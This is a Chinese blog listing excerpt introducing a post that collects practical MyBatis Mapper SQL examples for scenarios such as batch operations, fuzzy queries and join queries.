  • Mybatis实用Mapper SQL汇总示例 wdmcygah sqlmysqlmybatis实用
    Mybatis作为一个非常好用的持久层框架,相关资料真的是少得可怜,所幸的是官方文档还算详细。本博文主要列举一些个人感觉比较常用的场景及相应的Mapper SQL写法,希望能够对大家有所帮助。 不少持久层框架对动态SQL的支持不足,在SQL需要动态拼接时非常苦恼,而Mybatis很好地解决了这个问题,算是框架的一大亮点。对于常见的场景,例如:批量插入/更新/删除,模糊查询,多条件查询,联表查询,
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他